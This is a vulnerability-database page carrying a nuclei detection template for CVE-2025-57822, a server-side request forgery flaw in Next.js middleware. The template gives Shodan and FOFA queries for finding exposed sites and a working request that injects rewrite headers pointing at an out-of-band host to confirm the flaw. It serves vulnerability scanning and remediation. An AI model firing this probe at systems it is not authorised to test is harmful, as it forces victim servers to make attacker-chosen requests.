Lucene search
K

Next.js Middleware - Server-Side Request Forgery

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Next.js middleware enables server-side request forgery via insecure headers in affected versions.

Related
Refs
Code
id: CVE-2025-57822

info:
  name: Next.js Middleware - Server-Side Request Forgery
  author: prdngr,nicolas-latacora
  severity: medium
  description: |
    In Next.js prior to versions 14.2.32 and 15.4.7, when request headerswere insecurely passed to NextResponse.next(), an attacker could exploit this behavior to perform Server-Side Request Forgery (SSRF) attacks.
  impact: |
    Attackers can manipulate request headers to perform SSRF attacks by forcing the server to make requests to arbitrary internal or external URLs when middleware passes headers unsafely.
  remediation: |
    Upgrade Next.js to version 14.2.32, 15.4.7, or later that properly validates and sanitizes request headers in NextResponse.next().
  reference:
    - https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f
    - https://vercel.com/changelog/cve-2025-57822
    - https://nvd.nist.gov/vuln/detail/CVE-2025-57822
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-57822
    epss-score: 0.02328
    epss-percentile: 0.81495
    cwe-id: CWE-918
  metadata:
    verified: true
    vendor: vercel
    product: next.js
    shodan-query:
      - cpe:"cpe:2.3:a:zeit:next.js"
      - http.html:"/_next/static"
    fofa-query:
      - body="/_next/static"
  tags: cve,cve2025,ssrf,nextjs,oast,oob,vuln

variables:
  cache-buster: "{{rand_text_alpha(10)}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 3
    matchers:
      - type: word
        part: body
        words:
          - "_next/static"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/?cb={{cache-buster}}"

    headers:
      Location: "https://oast.me"
      X-Middleware-Rewrite: "https://oast.me"

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"
# digest: 490a0046304402206cb2d11c44979eca9850016b471f0d4867b4e3e6ab72a89b7dae3c504ebe913a02202929317d9fe384c07933c0a57c4bf8b90f369d87d20eea2b41e5915d97b377f3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.16.5 - 8.2
EPSS0.02328
SSVC
22